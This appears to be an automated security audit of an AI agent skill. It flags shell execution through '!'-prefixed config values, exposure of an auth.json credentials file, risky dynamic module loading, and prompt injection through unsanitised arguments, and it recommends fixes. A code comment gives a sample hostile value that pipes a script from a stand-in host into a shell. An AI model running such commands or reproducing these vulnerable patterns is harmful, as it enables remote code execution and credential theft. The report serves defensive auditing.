native-web-search

Verdict: Fail

Audited by Gen Agent Trust Hub on Feb 27, 2026

Risk Level: HIGH
Findings: COMMAND_EXECUTION, CREDENTIALS_UNSAFE, REMOTE_CODE_EXECUTION, PROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The resolveConfigValue function in search.mjs uses execSync to run a shell command whenever a configuration string starts with an exclamation mark (!). Because this function resolves API keys from the auth.json file, any attacker who can influence that file achieves arbitrary command execution.
  • [CREDENTIALS_UNSAFE]: The script explicitly reads from and writes to ~/.pi/agent/auth.json. This file is known to contain sensitive authentication material, including long-lived API keys and OAuth refresh tokens for AI services.
  • [DYNAMIC_EXECUTION]: The loadPiAi function uses dynamic import() to load the @mariozechner/pi-ai module from computed paths. It searches through several locations including environment variables, parent node_modules directories (walking up 8 levels from the current working directory), and hardcoded development paths. This behavior can be exploited to execute malicious code if the script is run in a directory with a compromised node_modules tree.
  • [INDIRECT_PROMPT_INJECTION]: The skill is vulnerable to prompt injection via user-controlled inputs.
      ◦ Ingestion points: The query and purpose variables are read directly from command-line arguments (process.argv).
      ◦ Boundary markers: The buildUserPrompt function adds no delimiters and no instructions to ignore embedded commands.
      ◦ Capability inventory: The script can perform network requests via fetch, execute shell commands via execSync, and write to the filesystem via writeFileSync.
      ◦ Sanitization: The query and purpose strings are not sanitized or escaped before being interpolated into the final prompt sent to the LLM.
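The COMMAND_EXECUTION finding describes a pattern where config values prefixed with ! are shelled out. A minimal sketch of that pattern (the function name matches the report; the body is a hypothetical reconstruction, not the skill's actual code):

```javascript
import { execSync } from "node:child_process";

// Hypothetical reconstruction of the pattern the audit describes:
// a value beginning with "!" is treated as a shell command whose
// output becomes the resolved config value.
function resolveConfigValue(value) {
  if (typeof value === "string" && value.startsWith("!")) {
    // DANGER: anything written into auth.json runs with the user's
    // shell privileges, e.g. "!curl evil.example | sh".
    return execSync(value.slice(1), { encoding: "utf8" }).trim();
  }
  return value;
}
```

Because auth.json is attacker-influenceable per the report, every call through this resolver is a command-execution sink.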
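The DYNAMIC_EXECUTION finding can be illustrated with a sketch of the search order it describes: walk up to 8 parent directories from the working directory looking for the module, then dynamically import it. The walk depth and package name come from the report; the PI_AI_PATH variable name and the dist/index.js entry point are assumptions for illustration:

```javascript
import { existsSync } from "node:fs";
import { join, dirname } from "node:path";
import { pathToFileURL } from "node:url";

// Walk up to `maxLevels` parent directories from `startDir` looking
// for node_modules/@mariozechner/pi-ai. Any directory an attacker
// controls along this path can plant a malicious module.
function findPiAiDir(startDir, maxLevels = 8) {
  let dir = startDir;
  for (let i = 0; i < maxLevels; i++) {
    const candidate = join(dir, "node_modules", "@mariozechner", "pi-ai");
    if (existsSync(candidate)) return candidate;
    const parent = dirname(dir);
    if (parent === dir) break; // reached the filesystem root
    dir = parent;
  }
  return null;
}

async function loadPiAi() {
  // Env-var override first, then the node_modules walk (names hypothetical).
  const dir = process.env.PI_AI_PATH ?? findPiAiDir(process.cwd());
  if (!dir) throw new Error("@mariozechner/pi-ai not found");
  // Dynamic import() of a computed path — this is the risky step.
  return import(pathToFileURL(join(dir, "dist", "index.js")).href);
}
```

Running the script inside any directory whose ancestors contain a compromised node_modules tree is enough to hijack the import.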
Recommendations
  • The automated analysis detected serious security threats; do not install or run this skill until they are remediated.
  • Remove or strictly allow-list the shell-execution path in resolveConfigValue (values beginning with !).
  • Avoid reading and writing ~/.pi/agent/auth.json wholesale; access only the single credential the skill needs.
  • Load @mariozechner/pi-ai from a pinned, verified location instead of walking parent node_modules directories.
  • Delimit the query and purpose arguments in buildUserPrompt and instruct the model to treat them as data, not instructions.
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 27, 2026, 09:41 AM